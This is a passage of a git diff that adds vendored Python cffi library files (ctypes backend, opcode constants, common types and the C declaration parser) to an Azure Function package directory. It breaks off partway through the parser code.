issubclass(cdata_or_BType, CTypesData) + return cdata_or_BType._get_size() + + def alignof(self, BType): + assert issubclass(BType, CTypesData) + return BType._alignment() + + def newp(self, BType, source): + if not issubclass(BType, CTypesData): + raise TypeError + return BType._newp(source) + + def cast(self, BType, source): + return BType._cast_from(source) + + def callback(self, BType, source, error, onerror): + assert onerror is None # XXX not implemented + return BType(source, error) + + _weakref_cache_ref = None + + def gcp(self, cdata, destructor, size=0): + if self._weakref_cache_ref is None: + import weakref + class MyRef(weakref.ref): + def __eq__(self, other): + myref = self() + return self is other or ( + myref is not None and myref is other()) + def __ne__(self, other): + return not (self == other) + def __hash__(self): + try: + return self._hash + except AttributeError: + self._hash = hash(self()) + return self._hash + self._weakref_cache_ref = {}, MyRef + weak_cache, MyRef = self._weakref_cache_ref + + if destructor is None: + try: + del weak_cache[MyRef(cdata)] + except KeyError: + raise TypeError("Can remove destructor only on a object " + "previously returned by ffi.gc()") + return None + + def remove(k): + cdata, destructor = weak_cache.pop(k, (None, None)) + if destructor is not None: + destructor(cdata) + + new_cdata = self.cast(self.typeof(cdata), cdata) + assert new_cdata is not cdata + weak_cache[MyRef(new_cdata, remove)] = (cdata, destructor) + return new_cdata + + typeof = type + + def getcname(self, BType, replace_with): + return BType._get_c_name(replace_with) + + def typeoffsetof(self, BType, fieldname, num=0): + if isinstance(fieldname, str): + if num == 0 and issubclass(BType, CTypesGenericPtr): + BType = BType._BItem + if not issubclass(BType, CTypesBaseStructOrUnion): + raise TypeError("expected a struct or union ctype") + BField = BType._bfield_types[fieldname] + if BField is Ellipsis: + raise TypeError("not supported for bitfields") + return (BField, BType._offsetof(fieldname)) + elif isinstance(fieldname, (int, long)): + if issubclass(BType, CTypesGenericArray): + BType = BType._CTPtr + if not issubclass(BType, CTypesGenericPtr): + raise TypeError("expected an array or ptr ctype") + BItem = BType._BItem + offset 
= BItem._get_size() * fieldname
+            if offset > sys.maxsize:
+                raise OverflowError
+            return (BItem, offset)
+        else:
+            raise TypeError(type(fieldname))
+
+    def rawaddressof(self, BTypePtr, cdata, offset=None):
+        if isinstance(cdata, CTypesBaseStructOrUnion):
+            ptr = ctypes.pointer(type(cdata)._to_ctypes(cdata))
+        elif isinstance(cdata, CTypesGenericPtr):
+            if offset is None or not issubclass(type(cdata)._BItem,
+                                                CTypesBaseStructOrUnion):
+                raise TypeError("unexpected cdata type")
+            ptr = type(cdata)._to_ctypes(cdata)
+        elif isinstance(cdata, CTypesGenericArray):
+            ptr = type(cdata)._to_ctypes(cdata)
+        else:
+            raise TypeError("expected a <cdata 'struct-or-union'>")
+        if offset:
+            ptr = ctypes.cast(
+                ctypes.c_void_p(
+                    ctypes.cast(ptr, ctypes.c_void_p).value + offset),
+                type(ptr))
+        return BTypePtr._from_ctypes(ptr)
+
+
+class CTypesLibrary(object):
+
+    def __init__(self, backend, cdll):
+        self.backend = backend
+        self.cdll = cdll
+
+    def load_function(self, BType, name):
+        c_func = getattr(self.cdll, name)
+        funcobj = BType._from_ctypes(c_func)
+        funcobj._name = name
+        return funcobj
+
+    def read_variable(self, BType, name):
+        try:
+            ctypes_obj = BType._ctype.in_dll(self.cdll, name)
+        except AttributeError as e:
+            raise NotImplementedError(e)
+        return BType._from_ctypes(ctypes_obj)
+
+    def write_variable(self, BType, name, value):
+        new_ctypes_obj = BType._to_ctypes(value)
+        ctypes_obj = BType._ctype.in_dll(self.cdll, name)
+        ctypes.memmove(ctypes.addressof(ctypes_obj),
+                       ctypes.addressof(new_ctypes_obj),
+                       ctypes.sizeof(BType._ctype))
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py
new file mode 100644
index 0000000..b26ccc9
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cffi_opcode.py
@@ -0,0 +1,187 @@
+from .error import VerificationError
+
+class CffiOp(object):
+    def __init__(self, op, arg):
+        self.op = op
+        self.arg = arg
+
+    def as_c_expr(self):
+        if self.op is None:
+            assert isinstance(self.arg, str)
+            return '(_cffi_opcode_t)(%s)' % (self.arg,)
+        classname = CLASS_NAME[self.op]
+        return '_CFFI_OP(_CFFI_OP_%s, %s)' % (classname, self.arg)
+
+    def as_python_bytes(self):
+        if self.op is None and self.arg.isdigit():
+            value = int(self.arg)     # non-negative: '-' not in self.arg
+            if value >= 2**31:
+                raise OverflowError("cannot emit %r: limited to 2**31-1"
+                                    % (self.arg,))
+            return format_four_bytes(value)
+        if isinstance(self.arg, str):
+            raise VerificationError("cannot emit to Python: %r" % (self.arg,))
+        return format_four_bytes((self.arg << 8) | self.op)
+
+    def __str__(self):
+        classname = CLASS_NAME.get(self.op, self.op)
+        return '(%s %s)' % (classname, self.arg)
+
+def format_four_bytes(num):
+    return '\\x%02X\\x%02X\\x%02X\\x%02X' % (
+        (num >> 24) & 0xFF,
+        (num >> 16) & 0xFF,
+        (num >>  8) & 0xFF,
+        (num      ) & 0xFF)
+
+OP_PRIMITIVE       = 1
+OP_POINTER         = 3
+OP_ARRAY           = 5
+OP_OPEN_ARRAY      = 7
+OP_STRUCT_UNION    = 9
+OP_ENUM            = 11
+OP_FUNCTION        = 13
+OP_FUNCTION_END    = 15
+OP_NOOP            = 17
+OP_BITFIELD        = 19
+OP_TYPENAME        = 21
+OP_CPYTHON_BLTN_V  = 23   # varargs
+OP_CPYTHON_BLTN_N  = 25   # noargs
+OP_CPYTHON_BLTN_O  = 27   # O  (i.e. 
a single arg) +OP_CONSTANT = 29 +OP_CONSTANT_INT = 31 +OP_GLOBAL_VAR = 33 +OP_DLOPEN_FUNC = 35 +OP_DLOPEN_CONST = 37 +OP_GLOBAL_VAR_F = 39 +OP_EXTERN_PYTHON = 41 + +PRIM_VOID = 0 +PRIM_BOOL = 1 +PRIM_CHAR = 2 +PRIM_SCHAR = 3 +PRIM_UCHAR = 4 +PRIM_SHORT = 5 +PRIM_USHORT = 6 +PRIM_INT = 7 +PRIM_UINT = 8 +PRIM_LONG = 9 +PRIM_ULONG = 10 +PRIM_LONGLONG = 11 +PRIM_ULONGLONG = 12 +PRIM_FLOAT = 13 +PRIM_DOUBLE = 14 +PRIM_LONGDOUBLE = 15 + +PRIM_WCHAR = 16 +PRIM_INT8 = 17 +PRIM_UINT8 = 18 +PRIM_INT16 = 19 +PRIM_UINT16 = 20 +PRIM_INT32 = 21 +PRIM_UINT32 = 22 +PRIM_INT64 = 23 +PRIM_UINT64 = 24 +PRIM_INTPTR = 25 +PRIM_UINTPTR = 26 +PRIM_PTRDIFF = 27 +PRIM_SIZE = 28 +PRIM_SSIZE = 29 +PRIM_INT_LEAST8 = 30 +PRIM_UINT_LEAST8 = 31 +PRIM_INT_LEAST16 = 32 +PRIM_UINT_LEAST16 = 33 +PRIM_INT_LEAST32 = 34 +PRIM_UINT_LEAST32 = 35 +PRIM_INT_LEAST64 = 36 +PRIM_UINT_LEAST64 = 37 +PRIM_INT_FAST8 = 38 +PRIM_UINT_FAST8 = 39 +PRIM_INT_FAST16 = 40 +PRIM_UINT_FAST16 = 41 +PRIM_INT_FAST32 = 42 +PRIM_UINT_FAST32 = 43 +PRIM_INT_FAST64 = 44 +PRIM_UINT_FAST64 = 45 +PRIM_INTMAX = 46 +PRIM_UINTMAX = 47 +PRIM_FLOATCOMPLEX = 48 +PRIM_DOUBLECOMPLEX = 49 +PRIM_CHAR16 = 50 +PRIM_CHAR32 = 51 + +_NUM_PRIM = 52 +_UNKNOWN_PRIM = -1 +_UNKNOWN_FLOAT_PRIM = -2 +_UNKNOWN_LONG_DOUBLE = -3 + +_IO_FILE_STRUCT = -1 + +PRIMITIVE_TO_INDEX = { + 'char': PRIM_CHAR, + 'short': PRIM_SHORT, + 'int': PRIM_INT, + 'long': PRIM_LONG, + 'long long': PRIM_LONGLONG, + 'signed char': PRIM_SCHAR, + 'unsigned char': PRIM_UCHAR, + 'unsigned short': PRIM_USHORT, + 'unsigned int': PRIM_UINT, + 'unsigned long': PRIM_ULONG, + 'unsigned long long': PRIM_ULONGLONG, + 'float': PRIM_FLOAT, + 'double': PRIM_DOUBLE, + 'long double': PRIM_LONGDOUBLE, + 'float _Complex': PRIM_FLOATCOMPLEX, + 'double _Complex': PRIM_DOUBLECOMPLEX, + '_Bool': PRIM_BOOL, + 'wchar_t': PRIM_WCHAR, + 'char16_t': PRIM_CHAR16, + 'char32_t': PRIM_CHAR32, + 'int8_t': PRIM_INT8, + 'uint8_t': PRIM_UINT8, + 'int16_t': PRIM_INT16, + 'uint16_t': PRIM_UINT16, + 'int32_t': PRIM_INT32, + 'uint32_t': PRIM_UINT32, + 'int64_t': PRIM_INT64, + 'uint64_t': PRIM_UINT64, + 'intptr_t': PRIM_INTPTR, + 'uintptr_t': PRIM_UINTPTR, + 'ptrdiff_t': PRIM_PTRDIFF, + 'size_t': PRIM_SIZE, + 'ssize_t': PRIM_SSIZE, + 'int_least8_t': PRIM_INT_LEAST8, + 'uint_least8_t': PRIM_UINT_LEAST8, + 'int_least16_t': PRIM_INT_LEAST16, + 'uint_least16_t': PRIM_UINT_LEAST16, + 'int_least32_t': PRIM_INT_LEAST32, + 'uint_least32_t': PRIM_UINT_LEAST32, + 'int_least64_t': PRIM_INT_LEAST64, + 'uint_least64_t': PRIM_UINT_LEAST64, + 'int_fast8_t': PRIM_INT_FAST8, + 'uint_fast8_t': PRIM_UINT_FAST8, + 'int_fast16_t': PRIM_INT_FAST16, + 'uint_fast16_t': PRIM_UINT_FAST16, + 'int_fast32_t': PRIM_INT_FAST32, + 'uint_fast32_t': PRIM_UINT_FAST32, + 'int_fast64_t': PRIM_INT_FAST64, + 'uint_fast64_t': PRIM_UINT_FAST64, + 'intmax_t': PRIM_INTMAX, + 'uintmax_t': PRIM_UINTMAX, + } + +F_UNION = 0x01 +F_CHECK_FIELDS = 0x02 +F_PACKED = 0x04 +F_EXTERNAL = 0x08 +F_OPAQUE = 0x10 + +G_FLAGS = dict([('_CFFI_' + _key, globals()[_key]) + for _key in ['F_UNION', 'F_CHECK_FIELDS', 'F_PACKED', + 'F_EXTERNAL', 'F_OPAQUE']]) + +CLASS_NAME = {} +for _name, _value in list(globals().items()): + if _name.startswith('OP_') and isinstance(_value, int): + CLASS_NAME[_value] = _name[3:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py new file mode 100644 index 0000000..e5045ee --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/commontypes.py @@ -0,0 +1,80 @@ +import sys +from . import model +from .error import FFIError + + +COMMON_TYPES = {} + +try: + # fetch "bool" and all simple Windows types + from _cffi_backend import _get_common_types + _get_common_types(COMMON_TYPES) +except ImportError: + pass + +COMMON_TYPES['FILE'] = model.unknown_type('FILE', '_IO_FILE') +COMMON_TYPES['bool'] = '_Bool' # in case we got ImportError above + +for _type in model.PrimitiveType.ALL_PRIMITIVE_TYPES: + if _type.endswith('_t'): + COMMON_TYPES[_type] = _type +del _type + +_CACHE = {} + +def resolve_common_type(parser, commontype): + try: + return _CACHE[commontype] + except KeyError: + cdecl = COMMON_TYPES.get(commontype, commontype) + if not isinstance(cdecl, str): + result, quals = cdecl, 0 # cdecl is already a BaseType + elif cdecl in model.PrimitiveType.ALL_PRIMITIVE_TYPES: + result, quals = model.PrimitiveType(cdecl), 0 + elif cdecl == 'set-unicode-needed': + raise FFIError("The Windows type %r is only available after " + "you call ffi.set_unicode()" % (commontype,)) + else: + if commontype == cdecl: + raise FFIError( + "Unsupported type: %r. Please look at " + "http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations " + "and file an issue if you think this type should really " + "be supported." % (commontype,)) + result, quals = parser.parse_type_and_quals(cdecl) # recursive + + assert isinstance(result, model.BaseTypeByIdentity) + _CACHE[commontype] = result, quals + return result, quals + + +# ____________________________________________________________ +# extra types for Windows (most of them are in commontypes.c) + + +def win_common_types(): + return { + "UNICODE_STRING": model.StructType( + "_UNICODE_STRING", + ["Length", + "MaximumLength", + "Buffer"], + [model.PrimitiveType("unsigned short"), + model.PrimitiveType("unsigned short"), + model.PointerType(model.PrimitiveType("wchar_t"))], + [-1, -1, -1]), + "PUNICODE_STRING": "UNICODE_STRING *", + "PCUNICODE_STRING": "const UNICODE_STRING *", + + "TBYTE": "set-unicode-needed", + "TCHAR": "set-unicode-needed", + "LPCTSTR": "set-unicode-needed", + "PCTSTR": "set-unicode-needed", + "LPTSTR": "set-unicode-needed", + "PTSTR": "set-unicode-needed", + "PTBYTE": "set-unicode-needed", + "PTCHAR": "set-unicode-needed", + } + +if sys.platform == 'win32': + COMMON_TYPES.update(win_common_types()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py new file mode 100644 index 0000000..c4acd23 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/cparser.py @@ -0,0 +1,1006 @@ +from . import model +from .commontypes import COMMON_TYPES, resolve_common_type +from .error import FFIError, CDefError +try: + from . import _pycparser as pycparser +except ImportError: + import pycparser +import weakref, re, sys + +try: + if sys.version_info < (3,): + import thread as _thread + else: + import _thread + lock = _thread.allocate_lock() +except ImportError: + lock = None + +def _workaround_for_static_import_finders(): + # Issue #392: packaging tools like cx_Freeze can not find these + # because pycparser uses exec dynamic import. This is an obscure + # workaround. This function is never called. 
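
(For illustration, not part of the vendored file: resolve_common_type() above is what lets cdef() accept 'bool' and the stdint-style names without explicit typedefs; the function names in this sketch are invented.)

    from cffi import FFI
    ffi = FFI()
    ffi.cdef("bool is_ready(void); int32_t next_id(size_t n);")
    print(ffi.typeof("bool"))     # expected: <ctype '_Bool'>, via COMMON_TYPES['bool']
    print(ffi.typeof("int32_t"))  # expected: <ctype 'int32_t'>, a *_t name mapped to itself
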
+    import pycparser.yacctab
+    import pycparser.lextab
+
+CDEF_SOURCE_STRING = "<cdef source string>"
+_r_comment = re.compile(r"/\*.*?\*/|//([^\n\\]|\\.)*?$",
+                        re.DOTALL | re.MULTILINE)
+_r_define = re.compile(r"^\s*#\s*define\s+([A-Za-z_][A-Za-z_0-9]*)"
+                       r"\b((?:[^\n\\]|\\.)*?)$",
+                       re.DOTALL | re.MULTILINE)
+_r_line_directive = re.compile(r"^[ \t]*#[ \t]*(?:line|\d+)\b.*$", re.MULTILINE)
+_r_partial_enum = re.compile(r"=\s*\.\.\.\s*[,}]|\.\.\.\s*\}")
+_r_enum_dotdotdot = re.compile(r"__dotdotdot\d+__$")
+_r_partial_array = re.compile(r"\[\s*\.\.\.\s*\]")
+_r_words = re.compile(r"\w+|\S")
+_parser_cache = None
+_r_int_literal = re.compile(r"-?0?x?[0-9a-f]+[lu]*$", re.IGNORECASE)
+_r_stdcall1 = re.compile(r"\b(__stdcall|WINAPI)\b")
+_r_stdcall2 = re.compile(r"[(]\s*(__stdcall|WINAPI)\b")
+_r_cdecl = re.compile(r"\b__cdecl\b")
+_r_extern_python = re.compile(r'\bextern\s*"'
+                              r'(Python|Python\s*\+\s*C|C\s*\+\s*Python)"\s*.')
+_r_star_const_space = re.compile(       # matches "* const "
+    r"[*]\s*((const|volatile|restrict)\b\s*)+")
+_r_int_dotdotdot = re.compile(r"(\b(int|long|short|signed|unsigned|char)\s*)+"
+                              r"\.\.\.")
+_r_float_dotdotdot = re.compile(r"\b(double|float)\s*\.\.\.")
+
+def _get_parser():
+    global _parser_cache
+    if _parser_cache is None:
+        _parser_cache = pycparser.CParser()
+    return _parser_cache
+
+def _workaround_for_old_pycparser(csource):
+    # Workaround for a pycparser issue (fixed between pycparser 2.10 and
+    # 2.14): "char*const***" gives us a wrong syntax tree, the same as
+    # for "char***(*const)".  This means we can't tell the difference
+    # afterwards.  But "char(*const(***))" gives us the right syntax
+    # tree.  The issue only occurs if there are several stars in
+    # sequence with no parenthesis inbetween, just possibly qualifiers.
+    # Attempt to fix it by adding some parentheses in the source: each
+    # time we see "* const" or "* const *", we add an opening
+    # parenthesis before each star---the hard part is figuring out where
+    # to close them.
+    parts = []
+    while True:
+        match = _r_star_const_space.search(csource)
+        if not match:
+            break
+        #print repr(''.join(parts)+csource), '=>',
+        parts.append(csource[:match.start()])
+        parts.append('('); closing = ')'
+        parts.append(match.group())   # e.g. 
"* const " + endpos = match.end() + if csource.startswith('*', endpos): + parts.append('('); closing += ')' + level = 0 + i = endpos + while i < len(csource): + c = csource[i] + if c == '(': + level += 1 + elif c == ')': + if level == 0: + break + level -= 1 + elif c in ',;=': + if level == 0: + break + i += 1 + csource = csource[endpos:i] + closing + csource[i:] + #print repr(''.join(parts)+csource) + parts.append(csource) + return ''.join(parts) + +def _preprocess_extern_python(csource): + # input: `extern "Python" int foo(int);` or + # `extern "Python" { int foo(int); }` + # output: + # void __cffi_extern_python_start; + # int foo(int); + # void __cffi_extern_python_stop; + # + # input: `extern "Python+C" int foo(int);` + # output: + # void __cffi_extern_python_plus_c_start; + # int foo(int); + # void __cffi_extern_python_stop; + parts = [] + while True: + match = _r_extern_python.search(csource) + if not match: + break + endpos = match.end() - 1 + #print + #print ''.join(parts)+csource + #print '=>' + parts.append(csource[:match.start()]) + if 'C' in match.group(1): + parts.append('void __cffi_extern_python_plus_c_start; ') + else: + parts.append('void __cffi_extern_python_start; ') + if csource[endpos] == '{': + # grouping variant + closing = csource.find('}', endpos) + if closing < 0: + raise CDefError("'extern \"Python\" {': no '}' found") + if csource.find('{', endpos + 1, closing) >= 0: + raise NotImplementedError("cannot use { } inside a block " + "'extern \"Python\" { ... }'") + parts.append(csource[endpos+1:closing]) + csource = csource[closing+1:] + else: + # non-grouping variant + semicolon = csource.find(';', endpos) + if semicolon < 0: + raise CDefError("'extern \"Python\": no ';' found") + parts.append(csource[endpos:semicolon+1]) + csource = csource[semicolon+1:] + parts.append(' void __cffi_extern_python_stop;') + #print ''.join(parts)+csource + #print + parts.append(csource) + return ''.join(parts) + +def _warn_for_string_literal(csource): + if '"' not in csource: + return + for line in csource.splitlines(): + if '"' in line and not line.lstrip().startswith('#'): + import warnings + warnings.warn("String literal found in cdef() or type source. " + "String literals are ignored here, but you should " + "remove them anyway because some character sequences " + "confuse pre-parsing.") + break + +def _warn_for_non_extern_non_static_global_variable(decl): + if not decl.storage: + import warnings + warnings.warn("Global variable '%s' in cdef(): for consistency " + "with C it should have a storage class specifier " + "(usually 'extern')" % (decl.name,)) + +def _remove_line_directives(csource): + # _r_line_directive matches whole lines, without the final \n, if they + # start with '#line' with some spacing allowed, or '#NUMBER'. This + # function stores them away and replaces them with exactly the string + # '#line@N', where N is the index in the list 'line_directives'. 
+ line_directives = [] + def replace(m): + i = len(line_directives) + line_directives.append(m.group()) + return '#line@%d' % i + csource = _r_line_directive.sub(replace, csource) + return csource, line_directives + +def _put_back_line_directives(csource, line_directives): + def replace(m): + s = m.group() + if not s.startswith('#line@'): + raise AssertionError("unexpected #line directive " + "(should have been processed and removed") + return line_directives[int(s[6:])] + return _r_line_directive.sub(replace, csource) + +def _preprocess(csource): + # First, remove the lines of the form '#line N "filename"' because + # the "filename" part could confuse the rest + csource, line_directives = _remove_line_directives(csource) + # Remove comments. NOTE: this only work because the cdef() section + # should not contain any string literals (except in line directives)! + def replace_keeping_newlines(m): + return ' ' + m.group().count('\n') * '\n' + csource = _r_comment.sub(replace_keeping_newlines, csource) + # Remove the "#define FOO x" lines + macros = {} + for match in _r_define.finditer(csource): + macroname, macrovalue = match.groups() + macrovalue = macrovalue.replace('\\\n', '').strip() + macros[macroname] = macrovalue + csource = _r_define.sub('', csource) + # + if pycparser.__version__ < '2.14': + csource = _workaround_for_old_pycparser(csource) + # + # BIG HACK: replace WINAPI or __stdcall with "volatile const". + # It doesn't make sense for the return type of a function to be + # "volatile volatile const", so we abuse it to detect __stdcall... + # Hack number 2 is that "int(volatile *fptr)();" is not valid C + # syntax, so we place the "volatile" before the opening parenthesis. + csource = _r_stdcall2.sub(' volatile volatile const(', csource) + csource = _r_stdcall1.sub(' volatile volatile const ', csource) + csource = _r_cdecl.sub(' ', csource) + # + # Replace `extern "Python"` with start/end markers + csource = _preprocess_extern_python(csource) + # + # Now there should not be any string literal left; warn if we get one + _warn_for_string_literal(csource) + # + # Replace "[...]" with "[__dotdotdotarray__]" + csource = _r_partial_array.sub('[__dotdotdotarray__]', csource) + # + # Replace "...}" with "__dotdotdotNUM__}". This construction should + # occur only at the end of enums; at the end of structs we have "...;}" + # and at the end of vararg functions "...);". Also replace "=...[,}]" + # with ",__dotdotdotNUM__[,}]": this occurs in the enums too, when + # giving an unknown value. + matches = list(_r_partial_enum.finditer(csource)) + for number, match in enumerate(reversed(matches)): + p = match.start() + if csource[p] == '=': + p2 = csource.find('...', p, match.end()) + assert p2 > p + csource = '%s,__dotdotdot%d__ %s' % (csource[:p], number, + csource[p2+3:]) + else: + assert csource[p:p+3] == '...' + csource = '%s __dotdotdot%d__ %s' % (csource[:p], number, + csource[p+3:]) + # Replace "int ..." or "unsigned long int..." with "__dotdotdotint__" + csource = _r_int_dotdotdot.sub(' __dotdotdotint__ ', csource) + # Replace "float ..." or "double..." with "__dotdotdotfloat__" + csource = _r_float_dotdotdot.sub(' __dotdotdotfloat__ ', csource) + # Replace all remaining "..." with the same name, "__dotdotdot__", + # which is declared with a typedef for the purpose of C parsing. 
+    csource = csource.replace('...', ' __dotdotdot__ ')
+    # Finally, put back the line directives
+    csource = _put_back_line_directives(csource, line_directives)
+    return csource, macros
+
+def _common_type_names(csource):
+    # Look in the source for what looks like usages of types from the
+    # list of common types.  A "usage" is approximated here as the
+    # appearance of the word, minus a "definition" of the type, which
+    # is the last word in a "typedef" statement.  Approximative only
+    # but should be fine for all the common types.
+    look_for_words = set(COMMON_TYPES)
+    look_for_words.add(';')
+    look_for_words.add(',')
+    look_for_words.add('(')
+    look_for_words.add(')')
+    look_for_words.add('typedef')
+    words_used = set()
+    is_typedef = False
+    paren = 0
+    previous_word = ''
+    for word in _r_words.findall(csource):
+        if word in look_for_words:
+            if word == ';':
+                if is_typedef:
+                    words_used.discard(previous_word)
+                    look_for_words.discard(previous_word)
+                    is_typedef = False
+            elif word == 'typedef':
+                is_typedef = True
+                paren = 0
+            elif word == '(':
+                paren += 1
+            elif word == ')':
+                paren -= 1
+            elif word == ',':
+                if is_typedef and paren == 0:
+                    words_used.discard(previous_word)
+                    look_for_words.discard(previous_word)
+            else:   # word in COMMON_TYPES
+                words_used.add(word)
+        previous_word = word
+    return words_used
+
+
+class Parser(object):
+
+    def __init__(self):
+        self._declarations = {}
+        self._included_declarations = set()
+        self._anonymous_counter = 0
+        self._structnode2type = weakref.WeakKeyDictionary()
+        self._options = {}
+        self._int_constants = {}
+        self._recomplete = []
+        self._uses_new_feature = None
+
+    def _parse(self, csource):
+        csource, macros = _preprocess(csource)
+        # XXX: for more efficiency we would need to poke into the
+        # internals of CParser...  the following registers the
+        # typedefs, because their presence or absence influences the
+        # parsing itself (but what they are typedef'ed to plays no role)
+        ctn = _common_type_names(csource)
+        typenames = []
+        for name in sorted(self._declarations):
+            if name.startswith('typedef '):
+                name = name[8:]
+                typenames.append(name)
+                ctn.discard(name)
+        typenames += sorted(ctn)
+        #
+        csourcelines = []
+        csourcelines.append('# 1 "<cdef automatic initialization code>"')
+        for typename in typenames:
+            csourcelines.append('typedef int %s;' % typename)
+        csourcelines.append('typedef int __dotdotdotint__, __dotdotdotfloat__,'
+                            ' __dotdotdot__;')
+        # this forces pycparser to consider the following in the file
+        # called <cdef source string> from line 1
+        csourcelines.append('# 1 "%s"' % (CDEF_SOURCE_STRING,))
+        csourcelines.append(csource)
+        fullcsource = '\n'.join(csourcelines)
+        if lock is not None:
+            lock.acquire()     # pycparser is not thread-safe...
+        try:
+            ast = _get_parser().parse(fullcsource)
+        except pycparser.c_parser.ParseError as e:
+            self.convert_pycparser_error(e, csource)
+        finally:
+            if lock is not None:
+                lock.release()
+        # csource will be used to find buggy source text
+        return ast, macros, csource
+
+    def _convert_pycparser_error(self, e, csource):
+        # xxx look for "<cdef source string>:NUM:" at the start of str(e)
+        # and interpret that as a line number.  This will not work if
+        # the user gives explicit ``# NUM "FILE"`` directives.
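
(A standalone sketch, not from the vendored file, of what _preprocess() and _common_type_names() produce; the declaration is invented.)

    from cffi.cparser import _preprocess, _common_type_names
    csource, macros = _preprocess("#define MAX_LEN 0x100\nsize_t trim(char *s, ...);")
    print(macros)                        # expected: {'MAX_LEN': '0x100'}
    print('__dotdotdot__' in csource)    # True: the vararg '...' was renamed
    print(_common_type_names(csource))   # expected: {'size_t'}
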
+ line = None + msg = str(e) + match = re.match(r"%s:(\d+):" % (CDEF_SOURCE_STRING,), msg) + if match: + linenum = int(match.group(1), 10) + csourcelines = csource.splitlines() + if 1 <= linenum <= len(csourcelines): + line = csourcelines[linenum-1] + return line + + def convert_pycparser_error(self, e, csource): + line = self._convert_pycparser_error(e, csource) + + msg = str(e) + if line: + msg = 'cannot parse "%s"\n%s' % (line.strip(), msg) + else: + msg = 'parse error\n%s' % (msg,) + raise CDefError(msg) + + def parse(self, csource, override=False, packed=False, pack=None, + dllexport=False): + if packed: + if packed != True: + raise ValueError("'packed' should be False or True; use " + "'pack' to give another value") + if pack: + raise ValueError("cannot give both 'pack' and 'packed'") + pack = 1 + elif pack: + if pack & (pack - 1): + raise ValueError("'pack' must be a power of two, not %r" % + (pack,)) + else: + pack = 0 + prev_options = self._options + try: + self._options = {'override': override, + 'packed': pack, + 'dllexport': dllexport} + self._internal_parse(csource) + finally: + self._options = prev_options + + def _internal_parse(self, csource): + ast, macros, csource = self._parse(csource) + # add the macros + self._process_macros(macros) + # find the first "__dotdotdot__" and use that as a separator + # between the repeated typedefs and the real csource + iterator = iter(ast.ext) + for decl in iterator: + if decl.name == '__dotdotdot__': + break + else: + assert 0 + current_decl = None + # + try: + self._inside_extern_python = '__cffi_extern_python_stop' + for decl in iterator: + current_decl = decl + if isinstance(decl, pycparser.c_ast.Decl): + self._parse_decl(decl) + elif isinstance(decl, pycparser.c_ast.Typedef): + if not decl.name: + raise CDefError("typedef does not declare any name", + decl) + quals = 0 + if (isinstance(decl.type.type, pycparser.c_ast.IdentifierType) and + decl.type.type.names[-1].startswith('__dotdotdot')): + realtype = self._get_unknown_type(decl) + elif (isinstance(decl.type, pycparser.c_ast.PtrDecl) and + isinstance(decl.type.type, pycparser.c_ast.TypeDecl) and + isinstance(decl.type.type.type, + pycparser.c_ast.IdentifierType) and + decl.type.type.type.names[-1].startswith('__dotdotdot')): + realtype = self._get_unknown_ptr_type(decl) + else: + realtype, quals = self._get_type_and_quals( + decl.type, name=decl.name, partial_length_ok=True, + typedef_example="*(%s *)0" % (decl.name,)) + self._declare('typedef ' + decl.name, realtype, quals=quals) + elif decl.__class__.__name__ == 'Pragma': + pass # skip pragma, only in pycparser 2.15 + else: + raise CDefError("unexpected <%s>: this construct is valid " + "C but not valid in cdef()" % + decl.__class__.__name__, decl) + except CDefError as e: + if len(e.args) == 1: + e.args = e.args + (current_decl,) + raise + except FFIError as e: + msg = self._convert_pycparser_error(e, csource) + if msg: + e.args = (e.args[0] + "\n *** Err: %s" % msg,) + raise + + def _add_constants(self, key, val): + if key in self._int_constants: + if self._int_constants[key] == val: + return # ignore identical double declarations + raise FFIError( + "multiple declarations of constant: %s" % (key,)) + self._int_constants[key] = val + + def _add_integer_constant(self, name, int_str): + int_str = int_str.lower().rstrip("ul") + neg = int_str.startswith('-') + if neg: + int_str = int_str[1:] + # "010" is not valid oct in py3 + if (int_str.startswith("0") and int_str != '0' + and not int_str.startswith("0x")): + int_str = "0o" + 
int_str[1:] + pyvalue = int(int_str, 0) + if neg: + pyvalue = -pyvalue + self._add_constants(name, pyvalue) + self._declare('macro ' + name, pyvalue) + + def _process_macros(self, macros): + for key, value in macros.items(): + value = value.strip() + if _r_int_literal.match(value): + self._add_integer_constant(key, value) + elif value == '...': + self._declare('macro ' + key, value) + else: + raise CDefError( + 'only supports one of the following syntax:\n' + ' #define %s ... (literally dot-dot-dot)\n' + ' #define %s NUMBER (with NUMBER an integer' + ' constant, decimal/hex/octal)\n' + 'got:\n' + ' #define %s %s' + % (key, key, key, value)) + + def _declare_function(self, tp, quals, decl): + tp = self._get_type_pointer(tp, quals) + if self._options.get('dllexport'): + tag = 'dllexport_python ' + elif self._inside_extern_python == '__cffi_extern_python_start': + tag = 'extern_python ' + elif self._inside_extern_python == '__cffi_extern_python_plus_c_start': + tag = 'extern_python_plus_c ' + else: + tag = 'function ' + self._declare(tag + decl.name, tp) + + def _parse_decl(self, decl): + node = decl.type + if isinstance(node, pycparser.c_ast.FuncDecl): + tp, quals = self._get_type_and_quals(node, name=decl.name) + assert isinstance(tp, model.RawFunctionType) + self._declare_function(tp, quals, decl) + else: + if isinstance(node, pycparser.c_ast.Struct): + self._get_struct_union_enum_type('struct', node) + elif isinstance(node, pycparser.c_ast.Union): + self._get_struct_union_enum_type('union', node) + elif isinstance(node, pycparser.c_ast.Enum): + self._get_struct_union_enum_type('enum', node) + elif not decl.name: + raise CDefError("construct does not declare any variable", + decl) + # + if decl.name: + tp, quals = self._get_type_and_quals(node, + partial_length_ok=True) + if tp.is_raw_function: + self._declare_function(tp, quals, decl) + elif (tp.is_integer_type() and + hasattr(decl, 'init') and + hasattr(decl.init, 'value') and + _r_int_literal.match(decl.init.value)): + self._add_integer_constant(decl.name, decl.init.value) + elif (tp.is_integer_type() and + isinstance(decl.init, pycparser.c_ast.UnaryOp) and + decl.init.op == '-' and + 